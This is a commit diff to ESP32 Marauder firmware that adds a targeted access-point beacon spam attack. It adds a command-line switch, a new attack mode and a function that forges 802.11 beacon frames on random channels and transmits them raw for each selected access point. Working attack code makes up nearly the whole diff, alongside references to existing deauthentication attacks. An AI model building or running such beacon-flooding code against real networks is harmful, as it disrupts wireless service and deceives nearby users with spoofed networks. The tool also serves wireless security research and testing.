Add targeted ap beacon spam

esp32_marauder/CommandLine.cpp

@@ -271,6 +271,7 @@ void CommandLine::runCommand(String input) {
       int attack_type_switch = this->argSearch(&cmd_args, "-t"); // Required
       int list_beacon_sw = this->argSearch(&cmd_args, "-l");
       int rand_beacon_sw = this->argSearch(&cmd_args, "-r");
+      int ap_beacon_sw = this->argSearch(&cmd_args, "-a");
   
       if (attack_type_switch == -1) {
         Serial.println("You must specify an attack type");
@@ -317,6 +318,19 @@ void CommandLine::runCommand(String input) {
             Serial.println("Starting random Beacon spam. Stop with " + (String)STOPSCAN_CMD);
             wifi_scan_obj.StartScan(WIFI_ATTACK_BEACON_SPAM, TFT_ORANGE);
           }
+          // Spam from AP list
+          else if (ap_beacon_sw != -1) {
+            if (!this->apSelected()) {
+              Serial.println("You don't have any targets selected. Use " + (String)SEL_CMD);
+              return;
+            }
+            #ifdef HAS_SCREEN
+              display_obj.clearScreen();
+              menu_function_obj.drawStatusBar();
+            #endif
+            Serial.println("Starting Targeted AP Beacon spam. Stop with " + (String)STOPSCAN_CMD);
+            wifi_scan_obj.StartScan(WIFI_ATTACK_AP_SPAM, TFT_MAGENTA);
+          }
           else {
             Serial.println("You did not specify a beacon attack type");
           }

esp32_marauder/WiFiScan.cpp

@@ -300,6 +300,8 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
     this->startWiFiAttacks(scan_mode, color, text_table4[7]);
   else if (scan_mode == WIFI_ATTACK_DEAUTH)
     this->startWiFiAttacks(scan_mode, color, text_table4[8]);
+  else if (scan_mode == WIFI_ATTACK_AP_SPAM)
+    this->startWiFiAttacks(scan_mode, color, " AP Beacon Spam ");
   else if (scan_mode == BT_SCAN_ALL) {
     #ifdef HAS_BT
       RunBluetoothScan(scan_mode, color);
@@ -1677,6 +1679,70 @@ void WiFiScan::beaconListSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t
   }
 }
 
+/*
+void WiFiScan::broadcastAPBeacon(uint32_t currentTime, AccessPoint custom_ssid) {
+  set_channel = random(1,12); 
+  esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
+  delay(1);
+
+  // Randomize SRC MAC
+  packet[10] = packet[16] = custom_ssid.bssid[0];
+  packet[11] = packet[17] = custom_ssid.bssid[1];
+  packet[12] = packet[18] = custom_ssid.bssid[2];
+  packet[13] = packet[19] = custom_ssid.bssid[3];
+  packet[14] = packet[20] = custom_ssid.bssid[4];
+  packet[15] = packet[21] = custom_ssid.bssid[5];
+
+  char ESSID[custom_ssid.essid.length() + 1] = {};
+  custom_ssid.essid.toCharArray(ESSID, custom_ssid.essid.length() + 1);
+}*/
+
+void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid) {
+  set_channel = random(1,12); 
+  esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
+  delay(1);  
+
+  // Randomize SRC MAC
+  packet[10] = packet[16] = random(256);
+  packet[11] = packet[17] = random(256);
+  packet[12] = packet[18] = random(256);
+  packet[13] = packet[19] = random(256);
+  packet[14] = packet[20] = random(256);
+  packet[15] = packet[21] = random(256);
+
+  char ESSID[custom_ssid.essid.length() + 1] = {};
+  custom_ssid.essid.toCharArray(ESSID, custom_ssid.essid.length() + 1);
+
+  int ssidLen = strlen(ESSID);
+  //int rand_len = sizeof(rand_reg);
+  int fullLen = ssidLen;
+  packet[37] = fullLen;
+
+  // Insert my tag
+  for(int i = 0; i < ssidLen; i++)
+    packet[38 + i] = ESSID[i];
+
+  /////////////////////////////
+  
+  packet[50 + fullLen] = set_channel;
+
+  uint8_t postSSID[13] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
+                      0x03, 0x01, 0x04 /*DSSS (Current Channel)*/ };
+
+
+
+  // Add everything that goes after the SSID
+  for(int i = 0; i < 12; i++) 
+    packet[38 + fullLen + i] = postSSID[i];
+  
+
+  esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
+  esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
+  esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
+
+  packets_sent = packets_sent + 3;
+}
+
 void WiFiScan::broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid) {
   set_channel = random(1,12); 
   esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
@@ -2567,6 +2633,15 @@ void WiFiScan::main(uint32_t currentTime)
       packets_sent = 0;
     }
   }
+  else if ((currentScanMode == WIFI_ATTACK_AP_SPAM)) {
+    for (int i = 0; i < access_points->size(); i++)
+      this->broadcastCustomBeacon(currentTime, access_points->get(i));
+
+    if (currentTime - initTime >= 1000) {
+      initTime = millis();
+      packets_sent = 0;
+    }
+  }
   else if ((currentScanMode == WIFI_ATTACK_RICK_ROLL))
   {
     // Need this for loop because getTouch causes ~10ms delay

esp32_marauder/WiFiScan.h

@@ -58,6 +58,7 @@
 #define WIFI_ATTACK_AUTH 18
 #define WIFI_ATTACK_MIMIC 19
 #define WIFI_ATTACK_DEAUTH 20
+#define WIFI_ATTACK_AP_SPAM 21
 
 #define GRAPH_REFRESH 100
 
@@ -229,6 +230,7 @@ class WiFiScan
     void sendDeauthAttack(uint32_t currentTime);
     void broadcastRandomSSID(uint32_t currentTime);
     void broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid);
+    void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid);
     void broadcastSetSSID(uint32_t current_time, char* ESSID);
     void RunAPScan(uint8_t scan_mode, uint16_t color);
     //void RunRickRoll(uint8_t scan_mode, uint16_t color);